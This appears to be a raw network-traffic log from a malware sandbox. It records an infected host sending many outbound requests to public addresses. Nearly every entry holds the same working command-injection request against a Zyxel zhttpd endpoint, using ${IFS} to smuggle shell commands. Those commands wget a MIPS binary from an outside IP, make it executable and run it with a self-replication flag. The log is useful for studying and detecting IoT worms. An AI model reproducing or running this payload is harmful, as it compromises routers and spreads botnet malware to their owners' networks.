                                                        Jan 28, 2024 10:13:05.650257111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7586192.168.2.146012486.3.181.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650291920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7587192.168.2.1447048199.143.245.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650340080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7588192.168.2.145406470.173.24.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650367975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7589192.168.2.143880238.78.25.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650398970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7590192.168.2.1449578188.35.55.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650439024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7591192.168.2.1434104158.2.141.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650475025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7592192.168.2.143689290.233.167.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650538921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7593192.168.2.1433058140.85.240.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650573015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7594192.168.2.1447702193.120.186.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650604010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7595192.168.2.1456368168.60.238.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650644064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7596192.168.2.1458046162.0.98.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650681019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7597192.168.2.1454326165.28.3.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650732040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7598192.168.2.1450900216.230.32.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650770903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7599192.168.2.1439064216.157.25.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650814056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7600192.168.2.144141058.35.32.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650846958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7601192.168.2.1450536156.138.5.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650870085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7602192.168.2.143329048.232.31.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650913000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7603192.168.2.145481289.66.246.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650945902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7604192.168.2.1457330183.149.219.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650995970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7605192.168.2.1456854191.89.130.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651027918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7606192.168.2.1446992122.179.242.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651073933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7607192.168.2.1444992102.250.192.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651102066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7608192.168.2.1452684134.120.150.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651134968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7609192.168.2.1438796132.122.86.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651149988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7610192.168.2.145321059.193.180.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651189089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7611192.168.2.145779451.73.128.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651232958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7612192.168.2.1440198134.19.177.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651249886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7613192.168.2.1436900146.156.197.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651288986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7614192.168.2.1435242106.236.252.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651330948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7615192.168.2.1437412146.237.165.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651391029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7616192.168.2.144776258.1.245.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651420116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7617192.168.2.1444890186.219.159.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651468039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7618192.168.2.1442442221.216.10.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651520014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7619192.168.2.145428867.162.42.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651557922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7620192.168.2.1443130130.118.203.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651587963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7621192.168.2.145536865.251.125.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651638031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7622192.168.2.145359894.65.207.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651679993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7623192.168.2.1446412112.204.46.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651731968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7624192.168.2.143420057.75.54.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651770115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7625192.168.2.1460518101.3.20.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651803970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7626192.168.2.1441240149.6.25.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651838064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7627192.168.2.145445675.73.144.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651871920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7628192.168.2.145240094.245.144.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651901007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7629192.168.2.1439952123.66.237.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.651983023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7630192.168.2.1453996206.57.164.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652018070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7631192.168.2.1456712124.174.226.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652059078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7632192.168.2.1445426175.202.80.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652082920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7633192.168.2.144680448.26.201.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652112961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7634192.168.2.1436176195.49.159.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652157068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7635192.168.2.1446806223.3.24.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652184010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7636192.168.2.143339839.166.147.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652220964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7637192.168.2.1438094112.123.100.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652259111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7638192.168.2.144064414.42.95.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652293921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7639192.168.2.1460718113.180.165.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652332067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7640192.168.2.144984227.253.82.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652371883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7641192.168.2.1433504199.225.241.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652405024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7642192.168.2.143750454.84.221.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652460098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7643192.168.2.1439458166.183.36.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652493954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7644192.168.2.1449652137.48.252.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652554989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7645192.168.2.1456134119.31.224.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.652590036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7646192.168.2.145158289.217.27.251443
                                                        TimestampBytes transferredDirectionData
